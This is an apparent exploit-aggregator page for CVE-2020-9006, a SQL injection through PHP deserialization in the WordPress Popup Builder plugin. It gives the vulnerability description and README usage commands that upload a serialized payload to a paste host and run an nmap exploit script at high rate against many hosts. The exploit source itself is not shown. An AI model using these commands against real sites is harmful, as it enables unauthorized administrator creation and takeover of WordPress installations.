CVE-2020-9006 PoC — WordPress Sygnoos Popup Builder SQL注入漏洞

Source

https://github.com/s3rgeym/cve-2020-9006

Associated Vulnerability

Title:WordPress Sygnoos Popup Builder SQL注入漏洞 (CVE-2020-9006)
Description:The Popup Builder plugin 2.2.8 through 2.6.7.6 for WordPress is vulnerable to SQL injection (in the sgImportPopups function in sg_popup_ajax.php) via PHP Deserialization on attacker-controlled data with the attachmentUrl POST variable. This allows creation of an arbitrary WordPress Administrator account, leading to possible Remote Code Execution because Administrators can run PHP code on Wordpress instances. (This issue has been fixed in the 3.x branch of popup-builder.)

Readme

# CVE-2020-9006: Wordpress Popup-Builder Plugin Exploit

Usage:

```zsh
# Create and upload payload
# Also see: php create-serialized-payload.php -h
$ php create-serialized-payload.php | curl -F 'sprunge=<-' http://sprunge.us
http://sprunge.us/XXXXXX

# Run exploit
$ nmap --script ./cve-2020-9006 --script-args http.useragent='Mozilla/5.0',payload-url='http://sprunge.us/XXXXXX
' --min-parallelism 64 --min-rate 1000 --max-retries 1 -p 80,443 -oX report.xml -d ...hosts
```

## Links

- [CVE-2020-9006 – popup-builder WP Plugin SQL injection via PHP Deserialization](https://zeroauth.ltd/blog/2020/02/16/cve-2020-9006-popup-builder-wp-plugin-sql-injection-via-php-deserialization/)

File Snapshot


 [4.0K]  /data/pocs/d49d521f1c0f1f75bf38516bb9c35e608d55df26
├── [2.1K]  create-serialized-payload.php
├── [1.6K]  cve-2020-9006.nse
└── [ 685]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!